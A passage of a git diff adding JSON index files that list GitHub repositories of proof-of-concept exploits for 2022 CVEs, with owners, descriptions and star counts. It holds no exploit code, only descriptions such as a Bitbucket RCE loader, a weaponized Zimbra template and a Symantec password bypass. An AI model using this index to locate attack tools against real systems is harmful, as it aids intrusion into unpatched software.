"stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitbucket", + "cve-2022-36804", + "poc", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541485417, + "name": "CVE-2022-36804", + "full_name": "Inplex-sys\/CVE-2022-36804", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-36804", + "description": "A loader for bitbucket 2022 rce (cve-2022-36804)", + "fork": false, + "created_at": "2022-09-26T08:35:31Z", + "updated_at": "2024-06-21T00:10:24Z", + "pushed_at": "2022-10-01T13:03:43Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitbucket", + "cve", + "cve-2022-36804", + "exploit-db", + "poc", + "rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 545363094, + "name": "CVE-2022-36804", + "full_name": "ColdFusionX\/CVE-2022-36804", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-36804", + "description": "Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)", + "fork": false, + "created_at": "2022-10-04T08:26:12Z", + "updated_at": "2023-08-30T07:20:35Z", + "pushed_at": "2022-10-04T08:51:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580496986, + "name": "CVE-2022-36804", + "full_name": "devengpk\/CVE-2022-36804", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-36804", + "description": null, + "fork": false, + "created_at": "2022-12-20T17:55:19Z", + "updated_at": "2022-12-22T19:57:50Z", + "pushed_at": "2022-12-20T18:00:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592304483, + "name": "cve-2022-36804", + "full_name": "walnutsecurity\/cve-2022-36804", + "owner": { + "login": "walnutsecurity", + "id": 92915142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4", + "html_url": "https:\/\/github.com\/walnutsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2022-36804", + "description": "A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1", + "fork": false, + "created_at": "2023-01-23T12:51:09Z", + "updated_at": "2024-07-05T04:30:49Z", + "pushed_at": "2023-01-25T10:04:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596350876, + "name": "Atlassian-Bitbucket-CVE-2022-36804", + "full_name": "imbas007\/Atlassian-Bitbucket-CVE-2022-36804", + "owner": { + "login": "imbas007", + "id": 100182585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100182585?v=4", + "html_url": "https:\/\/github.com\/imbas007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imbas007\/Atlassian-Bitbucket-CVE-2022-36804", + "description": null, + "fork": false, + "created_at": "2023-02-02T01:42:26Z", + "updated_at": "2023-02-02T01:55:08Z", + "pushed_at": "2023-02-02T02:58:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36944.json b/2022/CVE-2022-36944.json new file mode 100644 index 0000000000..45700ae0eb --- /dev/null +++ b/2022/CVE-2022-36944.json @@ -0,0 +1,33 @@ +[ + { + "id": 641498684, + "name": "lazylist-cve-poc", + "full_name": "yarocher\/lazylist-cve-poc", + "owner": { + "login": "yarocher", + "id": 71639641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71639641?v=4", + "html_url": "https:\/\/github.com\/yarocher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yarocher\/lazylist-cve-poc", + "description": "POC for the CVE-2022-36944 vulnerability exploit", + "fork": false, + "created_at": "2023-05-16T15:38:49Z", + "updated_at": "2024-11-07T04:32:53Z", + "pushed_at": "2023-05-16T15:50:03Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36946.json b/2022/CVE-2022-36946.json new file mode 100644 index 0000000000..1f8bfa503c --- /dev/null +++ b/2022/CVE-2022-36946.json @@ -0,0 +1,71 @@ +[ + { + "id": 518816810, + "name": "CVE-2022-36946", + "full_name": "Pwnzer0tt1\/CVE-2022-36946", + "owner": { + "login": "Pwnzer0tt1", + "id": 107208935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107208935?v=4", + "html_url": "https:\/\/github.com\/Pwnzer0tt1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pwnzer0tt1\/CVE-2022-36946", + "description": "CVE-2022-36946 linux kernel panic in netfilter_queue", + "fork": false, + "created_at": "2022-07-28T11:22:13Z", + "updated_at": "2024-08-12T20:25:35Z", + "pushed_at": "2024-06-21T18:53:25Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "denial-of-service", + "kernel", + "linux", + "linux-kernel", + "security" + ], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 561255728, + "name": "linux-4.19.72_CVE-2022-36946", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2022-36946", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2022-36946", + "description": null, + "fork": false, + "created_at": "2022-11-03T09:49:23Z", + "updated_at": "2023-03-08T01:54:32Z", + "pushed_at": "2022-11-10T07:03:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3699.json b/2022/CVE-2022-3699.json new file mode 100644 index 0000000000..7630e2b147 --- /dev/null +++ b/2022/CVE-2022-3699.json @@ -0,0 +1,95 @@ +[ + { + "id": 563872905, + "name": "CVE-2022-3699", + "full_name": "alfarom256\/CVE-2022-3699", + "owner": { + "login": "alfarom256", + "id": 36286171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36286171?v=4", + "html_url": "https:\/\/github.com\/alfarom256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alfarom256\/CVE-2022-3699", + "description": "Lenovo Diagnostics Driver EoP - Arbitrary R\/W", + "fork": false, + "created_at": "2022-11-09T14:15:30Z", + "updated_at": "2024-10-05T16:20:05Z", + "pushed_at": "2022-12-05T23:36:42Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 47, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 47, + "watchers": 169, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 581965577, + "name": "lenovo_exec", + "full_name": "estimated1337\/lenovo_exec", + "owner": { + "login": "estimated1337", + "id": 91435835, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91435835?v=4", + "html_url": "https:\/\/github.com\/estimated1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/estimated1337\/lenovo_exec", + "description": "CVE-2022-3699 with arbitrary kernel code execution capability", + "fork": false, + "created_at": "2022-12-25T04:34:26Z", + "updated_at": "2024-08-14T20:20:50Z", + "pushed_at": "2022-12-27T21:30:08Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 70, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 845287879, + "name": "CVE-2022-3699", + "full_name": "Eap2468\/CVE-2022-3699", + "owner": { + "login": "Eap2468", + "id": 68890963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68890963?v=4", + "html_url": "https:\/\/github.com\/Eap2468", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eap2468\/CVE-2022-3699", + "description": "Proof of Concept exploit for CVE-2022-3699", + "fork": false, + "created_at": "2024-08-21T00:42:40Z", + "updated_at": "2024-08-21T18:39:04Z", + "pushed_at": "2024-08-21T18:39:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37017.json b/2022/CVE-2022-37017.json new file mode 100644 index 0000000000..7bed8be161 --- /dev/null +++ b/2022/CVE-2022-37017.json @@ -0,0 +1,33 @@ +[ + { + "id": 831718045, + "name": "CVE-2022-37017", + "full_name": "apeppels\/CVE-2022-37017", + "owner": { + "login": "apeppels", + "id": 37070105, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37070105?v=4", + "html_url": "https:\/\/github.com\/apeppels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apeppels\/CVE-2022-37017", + "description": "Bypass for Symantec Endpoint Protection's Client User Interface Password", + "fork": false, + "created_at": "2024-07-21T12:26:35Z", + "updated_at": "2024-07-21T12:43:43Z", + "pushed_at": "2024-07-21T12:43:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37032.json b/2022/CVE-2022-37032.json new file mode 100644 index 0000000000..ad43f7df1e --- /dev/null +++ b/2022/CVE-2022-37032.json @@ -0,0 +1,33 @@ +[ + { + "id": 604134446, + "name": "CVE-2022-37032", + "full_name": "spwpun\/CVE-2022-37032", + "owner": { + "login": "spwpun", + "id": 32606457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32606457?v=4", + "html_url": "https:\/\/github.com\/spwpun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spwpun\/CVE-2022-37032", + "description": "PoC for CVE-2022-37032,tested on frr-8.3。", + "fork": false, + "created_at": "2023-02-20T12:07:22Z", + "updated_at": "2023-06-08T00:39:31Z", + "pushed_at": "2023-02-20T12:13:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37042.json b/2022/CVE-2022-37042.json new file mode 100644 index 0000000000..5e5ec0957f --- /dev/null +++ b/2022/CVE-2022-37042.json @@ -0,0 +1,95 @@ +[ + { + "id": 526332797, + "name": "Zimbra_CVE-2022-37042-_CVE-2022-27925", + "full_name": "GreyNoise-Intelligence\/Zimbra_CVE-2022-37042-_CVE-2022-27925", + "owner": { + "login": "GreyNoise-Intelligence", + "id": 32075718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32075718?v=4", + "html_url": "https:\/\/github.com\/GreyNoise-Intelligence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GreyNoise-Intelligence\/Zimbra_CVE-2022-37042-_CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-18T18:39:39Z", + "updated_at": "2022-08-30T09:13:19Z", + "pushed_at": "2022-08-18T18:41:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 528805450, + "name": "CVE-2022-37042", + "full_name": "aels\/CVE-2022-37042", + "owner": { + "login": "aels", + "id": 1212294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1212294?v=4", + "html_url": "https:\/\/github.com\/aels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aels\/CVE-2022-37042", + "description": "Zimbra CVE-2022-37042 Nuclei weaponized template", + "fork": false, + "created_at": "2022-08-25T10:43:13Z", + "updated_at": "2024-11-02T03:18:30Z", + "pushed_at": "2022-08-29T16:56:10Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556684444, + "name": "CVE-2022-37042", + "full_name": "0xf4n9x\/CVE-2022-37042", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-37042", + "description": "CVE-2022-37042 Zimbra Auth Bypass leads to RCE", + "fork": false, + "created_at": "2022-10-24T10:10:45Z", + "updated_at": "2024-11-16T19:51:23Z", + "pushed_at": "2022-12-09T02:45:14Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37177.json b/2022/CVE-2022-37177.json new file mode 100644 index 0000000000..f59fef325e --- /dev/null +++ b/2022/CVE-2022-37177.json @@ -0,0 +1,33 @@ +[ + { + "id": 529616558, + "name": "CVE-2022-37177", + "full_name": "JC175\/CVE-2022-37177", + "owner": { + "login": "JC175", + "id": 33234808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33234808?v=4", + "html_url": "https:\/\/github.com\/JC175", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JC175\/CVE-2022-37177", + "description": "CVE-2022-37177 - HireVue-Broken-Or-Risky-Cryptographic-Algorithm", + "fork": false, + "created_at": "2022-08-27T15:00:23Z", + "updated_at": "2022-08-28T14:42:50Z", + "pushed_at": "2022-08-27T16:38:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37201.json b/2022/CVE-2022-37201.json new file mode 100644 index 0000000000..a4278c17b5 --- /dev/null +++ b/2022/CVE-2022-37201.json @@ -0,0 +1,33 @@ +[ + { + "id": 536951837, + "name": "CVE-2022-37201", + "full_name": "AgainstTheLight\/CVE-2022-37201", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37201", + "description": "CVE-2022-37201 POC", + "fork": false, + "created_at": "2022-09-15T09:21:30Z", + "updated_at": "2022-09-15T09:21:30Z", + "pushed_at": "2022-09-15T09:23:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37202.json b/2022/CVE-2022-37202.json new file mode 100644 index 0000000000..3d93092227 --- /dev/null +++ b/2022/CVE-2022-37202.json @@ -0,0 +1,33 @@ +[ + { + "id": 536954849, + "name": "CVE-2022-37202", + "full_name": "AgainstTheLight\/CVE-2022-37202", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37202", + "description": "CVE-2022-37202 POC", + "fork": false, + "created_at": "2022-09-15T09:29:39Z", + "updated_at": "2022-09-15T09:29:39Z", + "pushed_at": "2022-09-15T09:31:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37203.json b/2022/CVE-2022-37203.json new file mode 100644 index 0000000000..50377c3df3 --- /dev/null +++ b/2022/CVE-2022-37203.json @@ -0,0 +1,33 @@ +[ + { + "id": 536958064, + "name": "CVE-2022-37203", + "full_name": "AgainstTheLight\/CVE-2022-37203", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37203", + "description": "CVE-2022-37203 POC", + "fork": false, + "created_at": "2022-09-15T09:38:52Z", + "updated_at": "2022-09-15T09:38:52Z", + "pushed_at": "2022-09-15T09:40:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37204.json b/2022/CVE-2022-37204.json new file mode 100644 index 0000000000..52002a8421 --- /dev/null +++ b/2022/CVE-2022-37204.json @@ -0,0 +1,33 @@ +[ + { + "id": 536959702, + "name": "CVE-2022-37204", + "full_name": "AgainstTheLight\/CVE-2022-37204", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37204", + "description": "CVE-2022-37204 POC", + "fork": false, + "created_at": "2022-09-15T09:43:39Z", + "updated_at": "2022-09-15T09:43:39Z", + "pushed_at": "2022-09-15T09:44:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37205.json b/2022/CVE-2022-37205.json new file mode 100644 index 0000000000..66d4f88be5 --- /dev/null +++ b/2022/CVE-2022-37205.json @@ -0,0 +1,33 @@ +[ + { + "id": 536960585, + "name": "CVE-2022-37205", + "full_name": "AgainstTheLight\/CVE-2022-37205", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37205", + "description": "CVE-2022-37205 POC", + "fork": false, + "created_at": "2022-09-15T09:46:06Z", + "updated_at": "2022-09-15T09:46:06Z", + "pushed_at": "2022-09-15T09:46:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37206.json b/2022/CVE-2022-37206.json new file mode 100644 index 0000000000..13429a9ae7 --- /dev/null +++ b/2022/CVE-2022-37206.json @@ -0,0 +1,33 @@ +[ + { + "id": 536961405, + "name": "CVE-2022-37206", + "full_name": "AgainstTheLight\/CVE-2022-37206", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37206", + "description": "CVE-2022-37206 POC", + "fork": false, + "created_at": "2022-09-15T09:48:18Z", + "updated_at": "2022-09-15T09:48:18Z", + "pushed_at": "2022-09-15T09:49:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37207.json b/2022/CVE-2022-37207.json new file mode 100644 index 0000000000..3915774aa1 --- /dev/null +++ b/2022/CVE-2022-37207.json @@ -0,0 +1,33 @@ +[ + { + "id": 536963041, + "name": "CVE-2022-37207", + "full_name": "AgainstTheLight\/CVE-2022-37207", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37207", + "description": "CVE-2022-37207 POC", + "fork": false, + "created_at": "2022-09-15T09:53:06Z", + "updated_at": "2022-09-15T09:53:06Z", + "pushed_at": "2022-09-15T09:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37208.json b/2022/CVE-2022-37208.json new file mode 100644 index 0000000000..4ed49fd14b --- /dev/null +++ b/2022/CVE-2022-37208.json @@ -0,0 +1,33 @@ +[ + { + "id": 536963955, + "name": "CVE-2022-37208", + "full_name": "AgainstTheLight\/CVE-2022-37208", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37208", + "description": "CVE-2022-37208", + "fork": false, + "created_at": "2022-09-15T09:55:49Z", + "updated_at": "2022-09-15T09:57:01Z", + "pushed_at": "2022-09-15T09:56:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37209.json b/2022/CVE-2022-37209.json new file mode 100644 index 0000000000..9a7228d0d5 --- /dev/null +++ b/2022/CVE-2022-37209.json @@ -0,0 +1,33 @@ +[ + { + "id": 537366751, + "name": "CVE-2022-37209", + "full_name": "AgainstTheLight\/CVE-2022-37209", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37209", + "description": "CVE-2022-37209 POC", + "fork": false, + "created_at": "2022-09-16T08:15:13Z", + "updated_at": "2022-09-17T07:33:02Z", + "pushed_at": "2022-09-16T08:16:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37210.json b/2022/CVE-2022-37210.json new file mode 100644 index 0000000000..8a8c0d0e8a --- /dev/null +++ b/2022/CVE-2022-37210.json @@ -0,0 +1,33 @@ +[ + { + "id": 537367651, + "name": "CVE-2022-37210", + "full_name": "AgainstTheLight\/CVE-2022-37210", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37210", + "description": "CVE-2022-37210 POC", + "fork": false, + "created_at": "2022-09-16T08:17:56Z", + "updated_at": "2022-09-17T07:32:55Z", + "pushed_at": "2022-09-16T08:18:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37298.json b/2022/CVE-2022-37298.json new file mode 100644 index 0000000000..80f98c5c65 --- /dev/null +++ b/2022/CVE-2022-37298.json @@ -0,0 +1,33 @@ +[ + { + "id": 551104266, + "name": "cve-2022-37298", + "full_name": "dbyio\/cve-2022-37298", + "owner": { + "login": "dbyio", + "id": 12803470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12803470?v=4", + "html_url": "https:\/\/github.com\/dbyio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbyio\/cve-2022-37298", + "description": "CVE-2022-37298 Shinken Monitoring", + "fork": false, + "created_at": "2022-10-13T21:07:02Z", + "updated_at": "2023-06-19T08:26:27Z", + "pushed_at": "2022-11-02T20:36:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37332.json b/2022/CVE-2022-37332.json new file mode 100644 index 0000000000..548fb897dc --- /dev/null +++ b/2022/CVE-2022-37332.json @@ -0,0 +1,33 @@ +[ + { + "id": 590713271, + "name": "CVE-2022-37332-RCE-", + "full_name": "SpiralBL0CK\/CVE-2022-37332-RCE-", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-37332-RCE-", + "description": "CURRENTLY UNDER WORK... ALL I NEED TO IMPLEMENT IS JIT SPRAYING ..... ", + "fork": false, + "created_at": "2023-01-19T02:41:54Z", + "updated_at": "2023-01-19T02:43:59Z", + "pushed_at": "2023-01-19T03:11:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No 